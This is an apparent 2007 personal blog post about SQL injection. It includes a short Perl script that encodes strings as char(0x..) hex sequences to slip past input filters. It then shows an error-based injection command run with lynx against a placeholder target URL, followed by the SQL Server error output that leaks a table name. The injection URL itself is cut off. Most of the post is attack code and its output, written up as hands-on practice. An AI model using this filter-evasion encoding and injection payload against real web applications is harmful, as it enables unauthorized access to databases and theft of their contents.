Tuesday, August 28, 2007

SQLinjection -- convert method (continue)

My friend told me to encode some of the injection parameter from ascii to hex code. So I write a small perl script to do the job for me:

shaolinint@slash$ cat ascii2hex.pl
#! /usr/bin/perl
my $cmd = shift or die "usage: $0 string\n";
$cmd =~ s/(.)/ sprintf("char(0x%2x)%2B",ord($1)) /ge;
print "$cmd\n";

shaolinint@slash$ perl ascii2hex.pl table1 char(0x74)%2Bchar(0x61)%2Bchar(0x62)%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31)

I had to removed the '%2B' at the end of the code above to make it work on real injections:

shaolinint@slash$ lynx -dump http://www.target.com/hello.aspx?id=(convert(varchar(255),(SELECT+top+1+table_name+FROM+

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '{]table2 to a column of data type int.

The injections parameter working fine for me. But there is small problem, I still can not get the data from all tables and columns at the moment.

No comments: